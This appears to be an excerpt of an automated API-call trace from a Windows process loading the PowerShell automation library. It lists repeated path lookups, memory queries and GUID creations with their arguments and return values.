	[0285.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.664] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.665] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.665] VirtualQuery (in: lpAddress=0xcb660, lpBuffer=0xcc520, dwLength=0x30 | out: lpBuffer=0xcc520*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.666] VirtualQuery (in: lpAddress=0xcb6f0, lpBuffer=0xcc5b0, dwLength=0x30 | out: lpBuffer=0xcc5b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.666] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.666] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.666] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.666] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.666] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.667] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.667] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.667] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.667] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.667] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.667] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.465] VirtualQuery (in: lpAddress=0xcbaa0, lpBuffer=0xcc960, dwLength=0x30 | out: lpBuffer=0xcc960*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.466] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.470] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.470] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.470] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.471] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x707dd20d, Data2=0xcbab, Data3=0x4b28, Data4=([0]=0x90, [1]=0xfc, [2]=0xcd, [3]=0x36, [4]=0x41, [5]=0x8a, [6]=0x41, [7]=0xc1))) returned 0x0
	[0286.472] VirtualQuery (in: lpAddress=0xcb660, lpBuffer=0xcc520, dwLength=0x30 | out: lpBuffer=0xcc520*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.472] VirtualQuery (in: lpAddress=0xcb6f0, lpBuffer=0xcc5b0, dwLength=0x30 | out: lpBuffer=0xcc5b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.472] VirtualQuery (in: lpAddress=0xcb910, lpBuffer=0xcc7d0, dwLength=0x30 | out: lpBuffer=0xcc7d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.472] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x8998a5a4, Data2=0xd2ca, Data3=0x438e, Data4=([0]=0xab, [1]=0xc4, [2]=0x10, [3]=0x3b, [4]=0xbd, [5]=0xa0, [6]=0x4e, [7]=0x51))) returned 0x0
	[0286.473] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x2cd73963, Data2=0xcb30, Data3=0x4bc7, Data4=([0]=0x92, [1]=0x2d, [2]=0xdd, [3]=0xcc, [4]=0x1f, [5]=0x33, [6]=0x21, [7]=0x5b))) returned 0x0
	[0286.473] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x6be23080, Data2=0xfbed, Data3=0x4365, Data4=([0]=0x8c, [1]=0xb1, [2]=0x55, [3]=0xe1, [4]=0x6a, [5]=0xdb, [6]=0x56, [7]=0x7c))) returned 0x0
	[0286.474] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x280987fa, Data2=0xa31c, Data3=0x4d0d, Data4=([0]=0xa6, [1]=0xcd, [2]=0xaa, [3]=0x21, [4]=0x99, [5]=0xe6, [6]=0xdf, [7]=0x29))) returned 0x0
	[0286.474] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x4f000975, Data2=0xe827, Data3=0x44a5, Data4=([0]=0xa3, [1]=0xb9, [2]=0x4e, [3]=0x6b, [4]=0x1a, [5]=0x47, [6]=0x3c, [7]=0x12))) returned 0x0
	[0286.474] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xe2eb8463, Data2=0x9de, Data3=0x4794, Data4=([0]=0x88, [1]=0x7e, [2]=0x13, [3]=0x98, [4]=0xd, [5]=0x46, [6]=0xbb, [7]=0x79))) returned 0x0
	[0286.474] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x49b79156, Data2=0xba8b, Data3=0x4d0d, Data4=([0]=0x8d, [1]=0x44, [2]=0x42, [3]=0x10, [4]=0x99, [5]=0x19, [6]=0xa8, [7]=0x7a))) returned 0x0
	[0286.475] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x8f2208f7, Data2=0x81a0, Data3=0x49f8, Data4=([0]=0x92, [1]=0xec, [2]=0x1c, [3]=0xda, [4]=0x89, [5]=0x23, [6]=0x60, [7]=0x1e))) returned 0x0
	[0286.475] VirtualQuery (in: lpAddress=0xcb4d0, lpBuffer=0xcc390, dwLength=0x30 | out: lpBuffer=0xcc390*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.475] VirtualQuery (in: lpAddress=0xcb4d0, lpBuffer=0xcc390, dwLength=0x30 | out: lpBuffer=0xcc390*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.475] VirtualQuery (in: lpAddress=0xcb560, lpBuffer=0xcc420, dwLength=0x30 | out: lpBuffer=0xcc420*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.476] VirtualQuery (in: lpAddress=0xcb4d0, lpBuffer=0xcc390, dwLength=0x30 | out: lpBuffer=0xcc390*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.476] VirtualQuery (in: lpAddress=0xcb560, lpBuffer=0xcc420, dwLength=0x30 | out: lpBuffer=0xcc420*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.476] VirtualQuery (in: lpAddress=0xcb4d0, lpBuffer=0xcc390, dwLength=0x30 | out: lpBuffer=0xcc390*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.476] VirtualQuery (in: lpAddress=0xcb560, lpBuffer=0xcc420, dwLength=0x30 | out: lpBuffer=0xcc420*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.476] VirtualQuery (in: lpAddress=0xcb4d0, lpBuffer=0xcc390, dwLength=0x30 | out: lpBuffer=0xcc390*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.476] VirtualQuery (in: lpAddress=0xcb560, lpBuffer=0xcc420, dwLength=0x30 | out: lpBuffer=0xcc420*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.477] VirtualQuery (in: lpAddress=0xcb4d0, lpBuffer=0xcc390, dwLength=0x30 | out: lpBuffer=0xcc390*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.477] VirtualQuery (in: lpAddress=0xcb560, lpBuffer=0xcc420, dwLength=0x30 | out: lpBuffer=0xcc420*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.477] VirtualQuery (in: lpAddress=0xcb4d0, lpBuffer=0xcc390, dwLength=0x30 | out: lpBuffer=0xcc390*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.477] VirtualQuery (in: lpAddress=0xcb560, lpBuffer=0xcc420, dwLength=0x30 | out: lpBuffer=0xcc420*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.478] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.478] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.478] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.478] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.478] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.478] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.478] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.478] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x374fb35e, Data2=0xe1ab, Data3=0x4cf2, Data4=([0]=0xb5, [1]=0x6a, [2]=0x93, [3]=0x32, [4]=0xb3, [5]=0xd2, [6]=0xdb, [7]=0xf8))) returned 0x0
	[0286.479] VirtualQuery (in: lpAddress=0xcbde0, lpBuffer=0xccca0, dwLength=0x30 | out: lpBuffer=0xccca0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.479] VirtualQuery (in: lpAddress=0xcbde0, lpBuffer=0xccca0, dwLength=0x30 | out: lpBuffer=0xccca0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.479] VirtualQuery (in: lpAddress=0xcbe70, lpBuffer=0xccd30, dwLength=0x30 | out: lpBuffer=0xccd30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.479] VirtualQuery (in: lpAddress=0xcbde0, lpBuffer=0xccca0, dwLength=0x30 | out: lpBuffer=0xccca0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.479] VirtualQuery (in: lpAddress=0xcbe70, lpBuffer=0xccd30, dwLength=0x30 | out: lpBuffer=0xccd30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.480] VirtualQuery (in: lpAddress=0xcbde0, lpBuffer=0xccca0, dwLength=0x30 | out: lpBuffer=0xccca0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.480] VirtualQuery (in: lpAddress=0xcbe70, lpBuffer=0xccd30, dwLength=0x30 | out: lpBuffer=0xccd30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.480] VirtualQuery (in: lpAddress=0xcbde0, lpBuffer=0xccca0, dwLength=0x30 | out: lpBuffer=0xccca0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.480] VirtualQuery (in: lpAddress=0xcbe70, lpBuffer=0xccd30, dwLength=0x30 | out: lpBuffer=0xccd30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.480] VirtualQuery (in: lpAddress=0xcbde0, lpBuffer=0xccca0, dwLength=0x30 | out: lpBuffer=0xccca0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.481] VirtualQuery (in: lpAddress=0xcbe70, lpBuffer=0xccd30, dwLength=0x30 | out: lpBuffer=0xccd30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.481] VirtualQuery (in: lpAddress=0xcbde0, lpBuffer=0xccca0, dwLength=0x30 | out: lpBuffer=0xccca0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.481] VirtualQuery (in: lpAddress=0xcbe70, lpBuffer=0xccd30, dwLength=0x30 | out: lpBuffer=0xccd30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.481] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.481] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
